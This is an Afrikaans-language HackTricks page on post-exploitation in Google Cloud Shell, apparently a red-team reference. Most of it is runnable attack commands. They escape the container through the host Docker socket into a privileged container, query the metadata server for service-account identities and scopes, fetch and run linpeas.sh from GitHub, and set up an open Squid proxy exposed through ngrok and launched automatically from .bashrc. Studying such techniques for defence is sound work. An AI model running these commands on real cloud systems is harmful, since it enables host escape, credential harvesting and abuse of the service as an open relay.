GCP - Cloud Shell Post Exploitation

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Wolkskulp

Vir meer inligting oor Wolkskulp, kyk:

pageGCP - Cloud Shell Enum

Houerontsnapping

Let daarop dat die Google Cloud Shell binne 'n houer loop, jy kan maklik ontsnap na die gasheer deur die volgende te doen:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Hierdie word nie as 'n kwesbaarheid beskou deur Google nie, maar dit gee jou 'n wyer perspektief van wat in daardie omgewing gebeur.

Verder, let daarop dat jy vanaf die gasheer 'n diensrekening-token kan vind:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Met die volgende scopes:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Enumerateer metadata met LinPEAS:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Nadat jy https://github.com/carlospolop/bf_my_gcp_permissions met die token van die Diensrekening gebruik het, is geen toestemming ontdek nie...

Gebruik dit as 'n Proksi

As jy jou Google Cloud Shell-instantie as 'n proksi wil gebruik, moet jy die volgende opdragte uitvoer (of voeg dit in die .bashrc-lêer in):

sudo apt install -y squid

Net om jou te laat weet, Squid is 'n HTTP-proksi-diens. Skep 'n squid.conf-lêer met die volgende instellings:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

Kopieer die squid.conf lêer na /etc/squid.

sudo cp squid.conf /etc/squid

Voer uiteindelik die squid-diens uit:

sudo service squid start

Gebruik ngrok om die proksi beskikbaar te stel van buite af:

./ngrok tcp 3128

Na die uitvoering van die kopieer, kopieer die tcp:// url. As jy die proxy van 'n webblaaier wil uitvoer, word dit voorgestel om die tcp:// gedeelte en die poort te verwyder en die poort in die poortveld van jou webblaaier se proxy-instellings te plaas (squid is 'n http proxy bediener).

Vir beter gebruik by opstart, moet die .bashrc-lêer die volgende lyne bevat:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

Die instruksies is gekopieer vanaf https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Kyk daardie bladsy vir ander gekke idees om enige soort sagteware (databasisse en selfs Windows) in Cloud Shell te hardloop.

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated